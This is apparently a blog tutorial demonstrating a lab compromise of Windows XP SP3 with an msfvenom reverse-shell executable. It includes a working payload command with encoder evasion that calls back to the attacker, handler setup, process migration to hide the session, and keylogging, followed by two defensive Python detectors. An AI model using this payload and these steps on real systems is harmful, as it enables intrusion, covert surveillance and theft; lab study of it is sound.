Don't click that file! How to hack Windows XP SP3 with an msfvenom payload

LEGAL DISCLAIMER: This "hack" has been performed by using virtual machines running on my own computer. Don't use it against other people's systems, unless you've been given explicit written permission by their owners. I'm not responsible for any unintended use of these instructions.

A bunch of people on Quora keep asking me why it's so important to keep your system up-to-date.

They think if they keep using Windows XP, they're fine.

This post answers their questions better than any words.

Kali Linux includes a tool called msfvenom, which lets you build a custom payload for breaking into a victim machine.

In my case, I created an infected executable that, when clicked, opens up a reverse shell on the victim machine or, in other words, an invisible backdoor.

I had to get familiar with this new tool, which replaces msfpayload (now discontinued).

I tried to inject this payload in a Windows 7 virtual machine, but my attempts were unsuccessful. When I double-clicked the infected file, it didn't do anything and triggered Windows Error Reporting.

After checking the error logs, I found out that this is because the executable is unsigned, so Windows doesn't allow it to run. Maybe UAC has something to do with this problem.

I performed the same hack on Windows XP SP3 and I got in in a fraction of a second.

Executable creation

I built the infected executable with this command:

msfvenom -p windows/meterpreter/reverse_tcp  -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=(IP address of the Kali Linux machine) LPORT=443 -f exe > letmein.exe

The command selects the windows/meterpreter/reverse_tcp payload, which opens a shell on the victim machine.

The -e option then picks the x86 (32-bit) shikata_ga_nai encoder and -i 5 runs it for 5 iterations, so that the infected executable is harder to detect; -b '\x00' tells the encoder to keep null bytes out of the output.

Then it defines the IP of the attacking machine and its listening port (443, which is the HTTPS port).

The command creates a file called letmein.exe.

Payload preparation

After creating the executable file, I had to prepare the exploit.

Once msfconsole was started, I used the multi/handler exploit, set its payload to windows/meterpreter/reverse_tcp and configured its options as follows:


(NOTE: LHOST and LPORT in the above screenshot refer to the IP address of the attacking machine, i.e. my Kali Linux virtual machine, and to the port chosen to be opened on that machine. They stand for listening host and listening port.)

Exploitation preparation

I double-clicked letmein.exe on the victim machine and, at the same time, I launched the exploit from the attacking machine by entering the exploit command.

After a couple of seconds, I was already in.


You can see from the above screenshot that meterpreter opened a session from port 1071 on the victim machine back to the attacking machine, which was listening on port 443.

At this point, I was good to go, as my account was the system administrator on the machine (as is the case for most Windows home and small company users).

You can check your privilege level by running "getuid".

The first thing I did was to migrate the session to another process so Task Manager wouldn't show anything suspicious. I chose the printer spooler process for that.

To do that, you need the list of running processes on the victim machine, returned by the ps command, which shows the process ID (PID) of each one.


The command migrate PID will do the trick.
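From the defender's side, the session described above (victim port 1071 connecting back to the listener on port 443) and the migration into the print spooler leave one observable trace on the victim: a process that has no business talking to the network holds an established outbound TCP connection. The following is an added example, not code from the original post or from Metasploit, that runs that check over a few constructed netstat-style lines annotated with a process name. The allowlist of processes expected to make outbound connections, the set of system services that never should, and all IP addresses and PIDs in the sample are assumptions made up for the example.

```python
"""
Added example (not part of the original post): flag processes holding
outbound TCP connections that a workstation baseline does not expect.
After a Meterpreter 'migrate' into spoolsv.exe, the spooler is the process
that shows up connected to the attacker's listener.
"""
from dataclasses import dataclass

# Hypothetical baseline: processes that are expected to hold outbound
# connections on this workstation. Tune per environment.
EXPECTED_OUTBOUND = {"iexplore.exe", "firefox.exe", "svchost.exe"}

# Hypothetical list of system services that should never initiate
# outbound connections; the print spooler (the post's migration target)
# is among them.
NEVER_OUTBOUND = {"spoolsv.exe", "lsass.exe", "services.exe", "winlogon.exe"}

# Constructed sample in a 'netstat -ano'-like layout with a process name
# appended:  TCP  local  remote  STATE  PID  process
SAMPLE_NETSTAT = """\
TCP 192.168.56.101:1071 192.168.56.102:443 ESTABLISHED 1496 spoolsv.exe
TCP 192.168.56.101:1065 203.0.113.10:443 ESTABLISHED 1820 firefox.exe
TCP 192.168.56.101:1080 192.168.56.102:8080 ESTABLISHED 2044 notepad.exe
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 944 svchost.exe
TCP 192.168.56.101:139 0.0.0.0:0 LISTENING 4 System
"""


@dataclass
class Connection:
    pid: int
    process: str
    local: str
    remote: str
    state: str


def parse_netstat(text):
    """Parse the constructed six-column format above into Connection records."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 6 or parts[0] != "TCP":
            continue  # skip headers, blank lines and non-TCP rows
        _, local, remote, state, pid, proc = parts
        conns.append(Connection(int(pid), proc.lower(), local, remote, state))
    return conns


def remote_port(addr):
    """Return the port number from an 'ip:port' string."""
    return int(addr.rsplit(":", 1)[1])


def suspicious_connections(conns):
    """Return (pid, process, remote, reason) for established connections
    owned by processes outside the outbound baseline."""
    findings = []
    for c in conns:
        if c.state != "ESTABLISHED":
            continue  # only live outbound sessions matter here
        if c.process in NEVER_OUTBOUND:
            findings.append((c.pid, c.process, c.remote,
                             "system service holding an outbound connection"))
        elif c.process not in EXPECTED_OUTBOUND:
            findings.append((c.pid, c.process, c.remote,
                             "process outside the outbound baseline"))
    return findings


if __name__ == "__main__":
    for pid, proc, remote, reason in suspicious_connections(parse_netstat(SAMPLE_NETSTAT)):
        print(f"PID {pid} {proc} -> {remote} (port {remote_port(remote)}): {reason}")
```

On the sample, the spooler's connection to port 443 is reported as a system service talking outbound, and notepad.exe is reported as outside the baseline, while the browser's connection to port 443 passes. The point is that the destination port alone (443 looks like ordinary HTTPS) tells you little; the process that owns the socket is what gives the migrated session away.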

Exploitation

For more details about this stage, check the embedded video.

Here I'm going to describe the most important results only, due to time constraints.
  • Keystroke recording: I could record the keystrokes on the victim machine, thanks to keyscan_start and keyscan_dump commands.
  • Desktop screenshot: I took a screenshot of my victim machine's desktop.
  • Creation of files on the victim machine: by opening up a shell on the victim machine (shell command), I could create a text file on the desktop calling it Hacked by M@tt. I know it sounds script kiddie-ish, but it's nonetheless fun.


Wrap-up

Running an outdated operating system such as Windows XP is a very bad idea.

In fact, I could hack into the victim machine in a fraction of a second after double-clicking the infected file.

This exploit hasn't succeeded on Windows 7 so far, but I'm gonna keep trying.

It has to be noted that this exploit was facilitated by two factors:
  1. Administrative privileges on the machine: my account was the system administrator on the machine. If this weren't the case, I'd have to perform a privilege escalation.
  2. No antivirus software installed: This is the default setup in Windows XP and I didn't install anything, as I'd just created the virtual machine. However, not all antivirus programs are created equal. In fact, by uploading the letmein.exe file to Virus Total, I noticed a 39/56 detection rate. I'd have maybe had better results by increasing the number of iterations when I created the payload.
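The encoder iterations described in the executable creation section and the detection rate noted above are two sides of the same trade-off: repeated shikata_ga_nai passes turn the payload into near-random bytes, and one cheap heuristic that antivirus engines and triage tools apply is to look for exactly that, a region of a file whose Shannon entropy sits near the 8 bits/byte ceiling. The following is an added example, not code from the original post, Metasploit or any antivirus product, that computes per-window entropy over a constructed file made of a low-entropy text region followed by a pseudo-random region standing in for encoded shellcode. The window size, the 7.0 bits/byte threshold and the sample contents are assumptions chosen for the example.

```python
"""
Added example (not part of the original post): a sliding-window entropy
heuristic for spotting packed or encoded regions in a file. Encoded
payloads raise entropy, which is one reason encoding alone does not hide
an executable from every scanner.
"""
import hashlib
import math
from collections import Counter


def shannon_entropy(data):
    """Bits of entropy per byte: 0.0 for one repeated value, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def high_entropy_regions(data, window=1024, threshold=7.0):
    """Return (offset, entropy) for each full window whose entropy exceeds threshold."""
    hits = []
    for off in range(0, len(data) - window + 1, window):
        e = shannon_entropy(data[off:off + window])
        if e > threshold:
            hits.append((off, round(e, 3)))
    return hits


def pseudo_random_bytes(n, seed=b"example"):
    """Deterministic stand-in for encoded shellcode: chained SHA-256 output (constructed)."""
    out = bytearray()
    block = seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


# Constructed sample file: 1024 bytes of repetitive text (the DOS stub message
# found in PE headers) followed by 1024 bytes that look like encoded code.
PLAIN_REGION = (b"This program cannot be run in DOS mode.\r\n" * 30)[:1024]
ENCODED_REGION = pseudo_random_bytes(1024)
SAMPLE_FILE = PLAIN_REGION + ENCODED_REGION


def classify(data, threshold=7.0):
    """Label a byte string by whether any window exceeds the entropy threshold."""
    hits = high_entropy_regions(data, threshold=threshold)
    return "suspicious: high-entropy regions" if hits else "no high-entropy regions"


if __name__ == "__main__":
    for off, e in high_entropy_regions(SAMPLE_FILE):
        print(f"offset {off}: {e} bits/byte")
    print(classify(SAMPLE_FILE))
```

On the sample, the text region scores well under 5 bits/byte and the pseudo-random region above 7.5, so only the second window is reported. A real scanner combines this with other signals (a legitimately compressed resource section is also high-entropy), which is why a heuristic like this is a triage aid rather than a verdict.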

I loved Windows XP and I believe it's maybe been the best Windows version, but it's time for the world to move away from it.

If you guys want to have a similar feeling to your operating system, you can use Linux Zorin.

Much more modern and secure.
